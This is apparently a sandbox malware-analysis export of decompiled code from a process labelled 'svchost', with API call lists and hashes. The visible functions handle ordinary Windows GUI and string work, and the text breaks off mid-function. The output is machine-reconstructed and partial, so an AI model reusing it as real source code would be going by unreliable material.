    				_Unknown_base(*)()* _t7;
    				struct HINSTANCE__* _t15;
    				struct HINSTANCE__* _t16;
    				CHAR* _t18;
    				signed short _t19;
    
    				_t18 = "COMCTL32.DLL";
    				_t16 = GetModuleHandleA(_t18);
    				_t6 = LoadLibraryA(_t18);
    				_t15 = _t6;
    				if(_t15 == 0) {
    					return _t6;
    				} else {
    					_t19 = 0;
    					_t7 = GetProcAddress(_t15, "InitCommonControlsEx");
    					if(_t7 != 0) {
    						_push(_a4);
    						if( *_t7() != 0) {
    							_t19 = _a4;
    							if(_t16 == 0) {
    								 *0x492020();
    								_t19 = _t19 | 0x00003fc0;
    							}
    						}
    					} else {
    						if((_a8 & 0x00003fc0) == _a8) {
    							 *0x492020();
    							_t19 = 0x3fc0;
    						}
    					}
    					FreeLibrary(_t15);
    					return _t19;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00487354,?,00020000), ref: 00487063
    • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0048706C
    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00487080
    • 741EE7F0.COMCTL32 ref: 0048709B
    • 741EE7F0.COMCTL32 ref: 004870B7
    • FreeLibrary.KERNEL32(00000000), ref: 004870C3
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Library$AddressFreeHandleLoadModuleProc
    • String ID: COMCTL32.DLL$InitCommonControlsEx
    • API String ID: 1437655972-4218389149
    • Opcode ID: 08bebc01a5467ae87b7c4e5ff4c631784e3df4bec415ab95759d2b72d8b1801b
    • Instruction ID: b624006b0eee7f1f73bc5abda9b7c268f8512eeab002cc325d322060f01fcc7e
    • Opcode Fuzzy Hash: 08bebc01a5467ae87b7c4e5ff4c631784e3df4bec415ab95759d2b72d8b1801b
    • Instruction Fuzzy Hash: 8AF0A432706612678621AB74AD5891F7AADBBE57517250837F940E3210DB68DC01876E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0041D090(intOrPtr __ecx) {
    				int _t136;
    				struct HWND__* _t141;
    				void* _t142;
    				intOrPtr* _t143;
    				void* _t144;
    				signed int _t149;
    				signed int _t156;
    				signed int _t169;
    				intOrPtr* _t170;
    				signed int _t174;
    				intOrPtr* _t177;
    				void* _t178;
    				signed int _t180;
    				signed int _t182;
    				int _t183;
    				void* _t184;
    				struct HWND__* _t186;
    				intOrPtr* _t187;
    				unsigned int _t190;
    				signed int _t191;
    				struct HWND__* _t198;
    				signed int _t203;
    				signed int _t205;
    				struct HWND__* _t206;
    				signed int _t207;
    				signed char _t208;
    				signed int _t209;
    				intOrPtr* _t251;
    				struct HWND__* _t270;
    				unsigned int _t274;
    				void* _t276;
    				void* _t277;
    				intOrPtr _t280;
    				int _t282;
    				void* _t283;
    				signed int _t286;
    				signed int _t288;
    				void* _t289;
    				void* _t290;
    				signed int _t292;
    				int _t295;
    				intOrPtr _t296;
    				intOrPtr* _t297;
    				int _t298;
    				void* _t299;
    
    				_push(0xffffffff);
    				_push(E0048E9C8);
    				_t136 =  *[fs:0x0];
    				_push(_t136);
    				 *[fs:0x0] = _t298;
    				_t299 = _t298 - 0x88;
    				_t270 =  *(_t299 + 0xa4);
    				_t280 = __ecx;
    				 *((intOrPtr*)(_t299 + 0x28)) = __ecx;
    				if(_t270 == 0) {
    					L58:
    					 *[fs:0x0] =  *(_t299 + 0x94);
    					return _t136;
    				}
    				_t136 = IsChild( *(__ecx + 0x1c), _t270);
    				_t303 = _t136;
    				if(_t136 == 0) {
    					goto L58;
    				}
    				_t136 = E00413AB0(E00418A40(0x3e9, 0, 0), _t303,  *((intOrPtr*)(_t280 + 0xdc)), _t299 + 0xc, 0);
    				if(_t136 == 0) {
    					goto L58;
    				}
    				_t136 = E00414340( *((intOrPtr*)(_t299 + 0xc)), _t270, 1);
    				_t295 = _t136;
    				 *(_t299 + 0x20) = _t295;
    				if(_t295 == 0xffffffff) {
    					goto L58;
    				}
    				_t9 =  *((intOrPtr*)(_t299 + 0xc)) + 0x14; // 0x14
    				_t136 = E00418A40(0x3ea,  *((intOrPtr*)(E004135B0(_t9, _t295, 0))), 0);
    				_t282 = _t136;
    				if(_t282 == 0) {
    					goto L58;
    				}
    				asm("sbb ebx, ebx");
    				_t203 =  ~( ~( *(_t282 + 0x14) & 0x00006000));
    				 *(_t299 + 0x24) = _t203;
    				_t141 = GetParent(_t270);
    				_t13 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
    				 *(_t299 + 0x30) = _t141;
    				_t142 = E004135B0(_t13, _t295, 0);
    				if(( *(_t282 + 0x14) & 0x00000040) == 0) {
    					__eflags =  *((intOrPtr*)(_t299 + 0x10)) + 0x14;
    					_t143 = E0041D5E0( *((intOrPtr*)(_t299 + 0x10)) + 0x14,  *((intOrPtr*)(_t299 + 0x10)) + 0x14, _t142);
    					_t21 =  *_t143 + 4; // 0x4
    					_t283 = _t143 + _t21;
    					_t144 = E0040C020( *((intOrPtr*)(_t299 + 0x10)) + 0x14, _t283);
    					_t299 = _t299 + 4;
    					 *((intOrPtr*)(_t299 + 0x1c)) =  *((intOrPtr*)(_t144 + _t283 + 8));
    				} else {
    					 *((intOrPtr*)(_t299 + 0x1c)) = 0;
    				}
    				E0040B5D0(_t299 + 0x30);
    				 *(_t299 + 0x30) = 0x496394;
    				 *((intOrPtr*)(_t299 + 0xa0)) = 0;
    				E0040B5D0(_t299 + 0x58);
    				 *(_t299 + 0x58) = 0x496394;
    				 *((char*)(_t299 + 0xa0)) = 1;
    				E0040B5D0(_t299 + 0x44);
    				 *(_t299 + 0x44) = 0x496394;
    				 *((char*)(_t299 + 0xa0)) = 2;
    				_t286 =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x10)) + 0x18)) - 1;
    				 *(_t299 + 0x18) = _t286;
    				if(_t286 <= 0) {
    					L31:
    					_t149 =  *(_t299 + 0x54);
    					_t274 = _t149 >> 2;
    					if(_t274 <= 0) {
    						L57:
    						 *((char*)(_t299 + 0xa0)) = 1;
    						 *(_t299 + 0x44) = 0x4962b0;
    						E0040B7D0(_t299 + 0x44);
    						 *((char*)(_t299 + 0xa0)) = 0;
    						 *(_t299 + 0x58) = 0x4962b0;
    						E0040B7D0(_t299 + 0x58);
    						 *((intOrPtr*)(_t299 + 0xa0)) = 0xffffffff;
    						 *(_t299 + 0x30) = 0x4962b0;
    						_t136 = E0040B7D0(_t299 + 0x30);
    						goto L58;
    					}
    					if(_t203 != 1) {
    						asm("sbb eax, eax");
    						_t205 =  ~_t149 &  *(_t299 + 0x4c);
    						_t288 = E0040BF30(_t205, _t274, _t295);
    						_t299 = _t299 + 0xc;
    						__eflags = _t288 - 0xffffffff;
    						if(_t288 != 0xffffffff) {
    							L45:
    							__eflags =  *((intOrPtr*)(_t299 + 0xac)) - 1;
    							if( *((intOrPtr*)(_t299 + 0xac)) != 1) {
    								_t288 = _t288 - 1;
    								__eflags = _t288;
    								if(_t288 >= 0) {
    									L51:
    									__eflags = _t288 - 0xffffffff;
    									if(_t288 == 0xffffffff) {
    										goto L57;
    									}
    									L52:
    									_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x60)) + _t288 * 4));
    									_t206 =  *(_t296 + 0x1c);
    									__eflags = _t206 -  *((intOrPtr*)(_t299 + 0xa8));
    									if(_t206 !=  *((intOrPtr*)(_t299 + 0xa8))) {
    										__eflags =  *(_t299 + 0xb0) - 1;
    										if( *(_t299 + 0xb0) == 1) {
    											E00414500( *((intOrPtr*)(_t299 + 0x10)), GetParent(_t206));
    											SendMessageA( *(_t296 + 0x1c), 0xf1, 1, 0);
    											 *((intOrPtr*)(_t299 + 0x70)) = E00413600( *((intOrPtr*)(_t299 + 0x10)) + 0x14,  *((intOrPtr*)( *(_t299 + 0x4c) + _t288 * 4)));
    											__eflags = 0;
    											 *((intOrPtr*)(_t299 + 0x78)) =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x2c)) + 0xdc));
    											 *((intOrPtr*)(_t299 + 0x80)) = 0;
    											 *((intOrPtr*)(_t299 + 0x84)) = 0;
    											 *((intOrPtr*)(_t299 + 0x9c)) = 0;
    											 *((intOrPtr*)(_t299 + 0xa0)) = 0;
    											E00418A40(0x7d8, _t299 + 0x6c, 0);
    										}
    										_t156 = IsWindow(_t206);
    										__eflags = _t156;
    										if(_t156 != 0) {
    											E0048768A(_t296);
    										}
    									}
    									goto L57;
    								}
    								L50:
    								_t288 = _t274 - 1;
    								goto L51;
    							}
    							__eflags =  *((intOrPtr*)(_t205 + _t288 * 4)) - _t295;
    							if( *((intOrPtr*)(_t205 + _t288 * 4)) != _t295) {
    								goto L51;
    							}
    							_t288 = _t288 + 1;
    							__eflags = _t288 - _t274;
    							if(_t288 != _t274) {
    								goto L51;
    							}
    							_t288 = 0;
    							goto L52;
    						}
    						_t288 = E0041FC10(_t154, _t205, _t274, _t295);
    						_t299 = _t299 + 0xc;
    						__eflags = _t288 - 0xffffffff;
    						if(_t288 == 0xffffffff) {
    							__eflags =  *((intOrPtr*)(_t299 + 0xac)) - 1;
    							if( *((intOrPtr*)(_t299 + 0xac)) != 1) {
    								goto L50;
    							}
    							_t288 = 0;
    							goto L52;
    						}
    						goto L45;
    					}
    					asm("sbb eax, eax");
    					_t169 =  ~( *(_t299 + 0x40)) &  *(_t299 + 0x38);
    					if( *((intOrPtr*)(_t299 + 0xac)) != _t203) {
    						_t288 = _t274 - 1;
    						__eflags = _t288;
    						if(_t288 < 0) {
    							goto L57;
    						}
    						_t170 = _t169 + _t288 * 4;
    						while(1) {
    							__eflags =  *_t170 -  *((intOrPtr*)(_t299 + 0x1c));
    							if( *_t170 <  *((intOrPtr*)(_t299 + 0x1c))) {
    								goto L51;
    							}
    							_t288 = _t288 - 1;
    							_t170 = _t170 - 4;
    							__eflags = _t288;
    							if(_t288 >= 0) {
    								continue;
    							}
    							goto L57;
    						}
    						goto L51;
    					}
    					_t288 = 0;
    					if(_t274 <= 0) {
    						goto L57;
    					}
    					while( *_t169 <  *((intOrPtr*)(_t299 + 0x1c))) {
    						_t288 = _t288 + 1;
    						_t169 = _t169 + 4;
    						if(_t288 < _t274) {
    							continue;
    						}
    						goto L57;
    					}
    					goto L51;
    				} else {
    					do {
    						_t38 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
    						_t297 = E004135B0(_t38, _t286, 0);
    						_t40 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
    						if(E00413C90(_t40, _t286) != 1) {
    							_t174 = E00418A40(0x3ea,  *_t297, 0);
    							_t42 = _t297 + 0x18; // 0x18
    							_t289 = _t42;
    							_t207 = _t174;
    							_t290 = _t289 + E0040C020( *_t297, _t289);
    							_t292 =  *(_t290 + E0040C020( *_t297, _t290));
    							_t177 = E0041D5E0( *(_t299 + 0x18) + 0x14, __eflags, _t297);
    							_t46 =  *_t177 + 4; // 0x4
    							_t276 = _t177 + _t46;
    							_t178 = E0040C020( *_t177, _t276);
    							_t299 = _t299 + 0xc;
    							__eflags = _t207;
    							 *(_t299 + 0x14) =  *(_t178 + _t276 + 4);
    							if(_t207 == 0) {
    								L28:
    								_t203 =  *(_t299 + 0x20);
    								_t180 =  *(_t299 + 0x18) - 1;
    								__eflags = _t180;
    								 *(_t299 + 0x18) = _t180;
    								_t286 = _t180;
    								goto L29;
    							}
    							__eflags = _t292;
    							if(_t292 == 0) {
    								goto L28;
    							}
    							_t182 = IsWindow( *(_t292 + 0x1c));
    							__eflags = _t182;
    							if(_t182 == 0) {
    								goto L28;
    							}
    							_t183 = IsWindowVisible( *(_t292 + 0x1c));
    							__eflags = _t183 - 1;
    							if(_t183 != 1) {
    								goto L28;
    							}
    							_t184 = E00487648(_t292);
    							__eflags = _t184 - 1;
    							if(_t184 != 1) {
    								goto L28;
    							}
    							_t208 =  *(_t207 + 0x14);
    							__eflags = _t208 & 0x00018000;
    							if((_t208 & 0x00018000) != 0) {
    								goto L28;
    							}
    							__eflags =  *(_t299 + 0x14) & 0x00000004;
    							if(( *(_t299 + 0x14) & 0x00000004) == 0) {
    								goto L28;
    							}
    							__eflags =  *(_t299 + 0xb0);
    							if( *(_t299 + 0xb0) == 0) {
    								L21:
    								_t186 =  *(_t299 + 0xb4);
    								__eflags = _t186;
    								if(__eflags == 0) {
    									L23:
    									_t187 = E0041D5E0( *((intOrPtr*)(_t299 + 0x10)) + 0x14, __eflags, _t297);
    									_t68 =  *_t187 + 4; // 0x4
    									_t277 = _t187 + _t68;
    									_t209 =  *(E0040C020( *_t187, _t277) + _t277 + 8);
    									_t190 =  *(_t299 + 0x44) >> 2;
    									_t299 = _t299 + 4;
    									_t191 = _t190 - 1;
    									__eflags = _t191;
    									if(_t191 < 0) {
    										L27:
    										_t192 = _t191 + 1;
    										__eflags = _t191 + 1;
    										E0040BC60(_t299 + 0x50, _t192 * 4, _t299 + 0x14, 4);
    										 *(_t299 + 0x20) = _t292;
    										E0040BC60(_t299 + 0x64, _t192 * 4, _t299 + 0x14, 4);
    										 *(_t299 + 0x20) = _t209;
    										E0040BC60(_t299 + 0x3c, _t192 * 4, _t299 + 0x14, 4);
    										goto L28;
    									}
    									_t251 =  *(_t299 + 0x38) + _t191 * 4;
    									while(1) {
    										__eflags =  *_t251 - _t209;
    										if( *_t251 <= _t209) {
    											goto L27;
    										}
    										_t191 = _t191 - 1;
    										_t251 = _t251 - 4;
    										__eflags = _t191;
    										if(_t191 >= 0) {
    											continue;
    										}
    										goto L27;
    									}
    									goto L27;
    								}
    								__eflags = IsChild(_t186,  *(_t292 + 0x1c));
    								if(__eflags == 0) {
    									goto L28;
    								}
    								goto L23;
    							}
    							__eflags = _t208 & 0x00000004;
    							if((_t208 & 0x00000004) == 0) {
    								goto L28;
    							}
    							_t198 = GetParent( *(_t292 + 0x1c));
    							__eflags = _t198 -  *((intOrPtr*)(_t299 + 0x28));
    							if(_t198 !=  *((intOrPtr*)(_t299 + 0x28))) {
    								goto L28;
    							}
    							goto L21;
    						} else {
    							_t286 = _t286 - 1;
    							 *(_t299 + 0x18) = _t286;
    						}
    						L29:
    					} while (_t286 > 0);
    					_t295 =  *(_t299 + 0x24);
    					goto L31;
    				}
    			}

    APIs
    • IsChild.USER32(?,?), ref: 0041D0C8
    • GetParent.USER32(?), ref: 0041D159
    • IsWindow.USER32(?), ref: 0041D28B
    • IsWindowVisible.USER32(?), ref: 0041D29D
      • Part of subcall function 00487648: IsWindowEnabled.USER32(?), ref: 00487652
    • GetParent.USER32(?), ref: 0041D2EE
    • IsChild.USER32(?,?), ref: 0041D30E
    • GetParent.USER32(?), ref: 0041D4B7
    • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0041D4D4
    • IsWindow.USER32(?), ref: 0041D52F
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ParentWindow$Child$EnabledMessageSendVisible
    • String ID:
    • API String ID: 2452671399-0
    • Opcode ID: a7452f2960d92d3a684d1068efa9b1c43d4c814e172b0bba0d04e3b2fde3cf21
    • Instruction ID: a5f20b7b88db69fc4b61bd10d8e82ff90ca639ca5de141c38bc98b161a3904f0
    • Opcode Fuzzy Hash: a7452f2960d92d3a684d1068efa9b1c43d4c814e172b0bba0d04e3b2fde3cf21
    • Instruction Fuzzy Hash: 64E1B3B1A043519FC720DF55C881BAFB7A5BF84704F040A2EF99597381DB78E885CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E004783D4(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
    				signed int _v8;
    				intOrPtr _v20;
    				short* _v28;
    				int _v32;
    				short* _v36;
    				short* _v40;
    				int _v44;
    				void* _v60;
    				int _t61;
    				int _t62;
    				int _t82;
    				int _t83;
    				int _t88;
    				short* _t89;
    				int _t90;
    				void* _t91;
    				int _t99;
    				intOrPtr _t101;
    				short* _t102;
    				int _t104;
    
    				_push(0xffffffff);
    				_push(0x49de30);
    				_push(E00472CF4);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t101;
    				_t102 = _t101 - 0x1c;
    				_v28 = _t102;
    				_t104 =  *0x4e19a8; // 0x1
    				if(_t104 != 0) {
    					L5:
    					if(_a16 > 0) {
    						_t83 = E004785F8(_a12, _a16);
    						_pop(_t91);
    						_a16 = _t83;
    					}
    					_t61 =  *0x4e19a8; // 0x1
    					if(_t61 != 2) {
    						if(_t61 != 1) {
    							goto L21;
    						} else {
    							if(_a28 == 0) {
    								_t82 =  *0x4e19e4; // 0x0
    								_a28 = _t82;
    							}
    							asm("sbb eax, eax");
    							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
    							_v32 = _t88;
    							if(_t88 == 0) {
    								goto L21;
    							} else {
    								_v8 = 0;
    								E00471390(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
    								_v28 = _t102;
    								_v40 = _t102;
    								_v8 = _v8 | 0xffffffff;
    								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
    									goto L21;
    								} else {
    									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
    									_v44 = _t99;
    									if(_t99 == 0) {
    										goto L21;
    									} else {
    										if((_a9 & 0x00000004) == 0) {
    											_v8 = 1;
    											E00471390(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
    											_v28 = _t102;
    											_t89 = _t102;
    											_v36 = _t89;
    											_v8 = _v8 | 0xffffffff;
    											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
    												goto L21;
    											} else {
    												_push(0);
    												_push(0);
    												if(_a24 != 0) {
    													_push(_a24);
    													_push(_a20);
    												} else {
    													_push(0);
    													_push(0);
    												}
    												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
    												if(_t99 == 0) {
    													goto L21;
    												} else {
    													goto L30;
    												}
    											}
    										} else {
    											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
    												L30:
    												_t62 = _t99;
    											} else {
    												goto L21;
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
    					}
    				} else {
    					_push(0);
    					_push(0);
    					_t90 = 1;
    					if(LCMapStringW(0, 0x100, 0x49de2c, _t90, ??, ??) == 0) {
    						if(LCMapStringA(0, 0x100, 0x49de28, _t90, 0, 0) == 0) {
    							L21:
    							_t62 = 0;
    						} else {
    							 *0x4e19a8 = 2;
    							goto L5;
    						}
    					} else {
    						 *0x4e19a8 = _t90;
    						goto L5;
    					}
    				}
    				 *[fs:0x0] = _v20;
    				return _t62;
    			}
    0x004783d7
    0x004783d9
    0x004783de
    0x004783e9
    0x004783ea
    0x004783f1
    0x004783f7
    0x004783fc
    0x00478402
    0x0047844a
    0x0047844d
    0x00478455
    0x0047845b
    0x0047845c
    0x0047845c
    0x0047845f
    0x00478467
    0x00478489
    0x00000000
    0x0047848f
    0x00478492
    0x00478494
    0x00478499
    0x00478499
    0x004784a9
    0x004784b9
    0x004784bb
    0x004784c0
    0x00000000
    0x004784c6
    0x004784c6
    0x004784d1
    0x004784d6
    0x004784db
    0x004784de
    0x004784fa
    0x00000000
    0x00478515
    0x00478527
    0x00478529
    0x0047852e
    0x00000000
    0x00478530
    0x00478534
    0x00478576
    0x00478585
    0x0047858a
    0x0047858d
    0x0047858f
    0x00478592
    0x004785ac
    0x00000000
    0x004785c6
    0x004785c9
    0x004785ca
    0x004785cb
    0x004785d1
    0x004785d4
    0x004785cd
    0x004785cd
    0x004785ce
    0x004785ce
    0x004785e7
    0x004785eb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004785eb
    0x00478536
    0x00478539
    0x004785f1
    0x004785f1
    0x00000000
    0x00000000
    0x00000000
    0x00478539
    0x00478534
    0x0047852e
    0x004784fa
    0x004784c0
    0x00478469
    0x0047847b
    0x0047847b
    0x00478404
    0x00478404
    0x00478405
    0x00478408
    0x0047841e
    0x0047843a
    0x00478562
    0x00478562
    0x00478440
    0x00478440
    0x00000000
    0x00478440
    0x00478420
    0x00478420
    0x00000000
    0x00478420
    0x0047841e
    0x0047856a
    0x00478575

    APIs
    • LCMapStringW.KERNEL32(00000000,00000100,0049DE2C,00000001,00000000,00000000,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 00478416
    • LCMapStringA.KERNEL32(00000000,00000100,0049DE28,00000001,00000000,00000000), ref: 00478432
    • LCMapStringA.KERNEL32(004B880C,?,?,004E19C0,?,0047A878,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047847B
    • MultiByteToWideChar.KERNEL32(004B880C,00000002,?,004E19C0,00000000,00000000,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 004784B3
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0047850B
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00478521
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00478554
    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 004785BC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: String$ByteCharMultiWide
    • String ID:
    • API String ID: 352835431-0
    • Opcode ID: df99220bf960930da31773b473e11d6c888c3e3c28566c72a8f847666ac17f06
    • Instruction ID: 993c88f653a3086166170ba2461b57764858c485ea7f4dcec785530c0086eac6
    • Opcode Fuzzy Hash: df99220bf960930da31773b473e11d6c888c3e3c28566c72a8f847666ac17f06
    • Instruction Fuzzy Hash: 05517C71940209BFCF228F54CC49AEF7FB8FB48B50F10812AF919A5260D7798D50DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00420D70(void* __ebx, void* __ecx, void* __edi, void* __ebp, struct tagPOINT _a8, intOrPtr _a12) {
    				intOrPtr _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct tagRECT _v32;
    				char _v36;
    				intOrPtr _v40;
    				long* _t42;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				long _t57;
    				void* _t71;
    				long _t72;
    				long _t86;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				long _t98;
    				void* _t104;
    
    				_t104 = __ecx;
    				if(E00484C84(__ebp, GetCapture()) == _t104) {
    					_t42 = _t104 + 0x48;
    					_v32.left =  *_t42;
    					_v32.top = _t42[1];
    					_v32.right.left = _t42[2];
    					_v32.bottom = _t42[3];
    					ClientToScreen( *(_t104 + 0x1c),  &_a8);
    					OffsetRect( &_v32,  ~( *((intOrPtr*)(_t104 + 0x40)) - _a8.x),  ~( *((intOrPtr*)(_t104 + 0x44)) - _a12));
    					_t71 = E00484C84(__ebp, GetParent( *(_t104 + 0x1c)));
    					E00489A84(_t71,  &_v36);
    					GetClientRect( *(_t71 + 0x1c),  &(_v32.right));
    					_t55 = _v40;
    					_t86 = _v32.right.left;
    					if(_t55 > _t86) {
    						OffsetRect( &_v32,  ~(_t55 - _t86), 0);
    					}
    					_t72 = _v32.right.left;
    					_t56 = _v8;
    					if(_t72 < _t56) {
    						OffsetRect( &_v32, _t56 - _t72, 0);
    						_t72 = _v32.right.left;
    					}
    					_t57 = _v32.top;
    					_t87 = _v12;
    					if(_t57 > _t87) {
    						OffsetRect( &_v32, 0,  ~(_t57 - _t87));
    						_t57 = _v32.top;
    						_t72 = _v32.right.left;
    					}
    					_t98 = _v32.bottom;
    					_t88 = _v4;
    					if(_t98 < _t88) {
    						OffsetRect( &_v32, 0, _t88 - _t98);
    						_t98 = _v32.bottom;
    						_t57 = _v32.top;
    						_t72 = _v32.right.left;
    					}
    					E00487591(_t104, _v32.left, _t57, _t72 - _v32.left, _t98 - _t57, 1);
    				}
    				return E00484BEB(_t104);
    			}

    0x00420d74
    0x00420d84
    0x00420d8a
    0x00420d91
    0x00420d98
    0x00420d9f
    0x00420daf
    0x00420db3
    0x00420ddc
    0x00420df2
    0x00420df7
    0x00420e05
    0x00420e0b
    0x00420e0f
    0x00420e15
    0x00420e23
    0x00420e23
    0x00420e25
    0x00420e29
    0x00420e2f
    0x00420e3b
    0x00420e3d
    0x00420e3d
    0x00420e41
    0x00420e45
    0x00420e4b
    0x00420e59
    0x00420e5b
    0x00420e5f
    0x00420e5f
    0x00420e63
    0x00420e67
    0x00420e6d
    0x00420e79
    0x00420e7b
    0x00420e7f
    0x00420e83
    0x00420e83
    0x00420e97
    0x00420e9d
    0x00420ea9

    APIs
    • GetCapture.USER32 ref: 00420D76
    • ClientToScreen.USER32(?,?), ref: 00420DB3
    • OffsetRect.USER32(?,?,?), ref: 00420DDC
    • GetParent.USER32(?), ref: 00420DE2
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000000), ref: 00489A98
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000008), ref: 00489AA1
    • GetClientRect.USER32(?,?), ref: 00420E05
    • OffsetRect.USER32(?,?,00000000), ref: 00420E23
    • OffsetRect.USER32(?,?,00000000), ref: 00420E3B
    • OffsetRect.USER32(?,00000000,?), ref: 00420E59
    • OffsetRect.USER32(?,00000000,?), ref: 00420E79
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$Client$Screen$CaptureParent
    • String ID:
    • API String ID: 838496554-0
    • Opcode ID: 48399e4f87c817582e6bd1e60a19b8e7c4b02e2f55068c033bf12efc016ad131
    • Instruction ID: 4357843f5900e8c3a63e9972a339a2bd7c56ee0ee9cef407ef4be6d8701846f7
    • Opcode Fuzzy Hash: 48399e4f87c817582e6bd1e60a19b8e7c4b02e2f55068c033bf12efc016ad131
    • Instruction Fuzzy Hash: 2E41F675208302AFD708DF68D984D6BB7E9ABD8704F008D1EF586C3351DA74ED488B66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E0042A1D0(intOrPtr* __ecx, intOrPtr _a4) {
    				char _v540;
    				char _v548;
    				void _v580;
    				char _v600;
    				intOrPtr _v612;
    				char _v624;
    				char _v628;
    				intOrPtr _v632;
    				signed int _v642;
    				void* __esi;
    				void* _t43;
    				void* _t63;
    				intOrPtr* _t64;
    
    				_t64 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x40)) != 0xffffffff) {
    					memset( &_v580, 0, 0x14 << 2);
    					_v600 = 0x50;
    					_t63 =  *0x4926ac(_a4,  &_v580,  &_v600);
    					if(_t63 != 0xffffffff) {
    						_push(0x21);
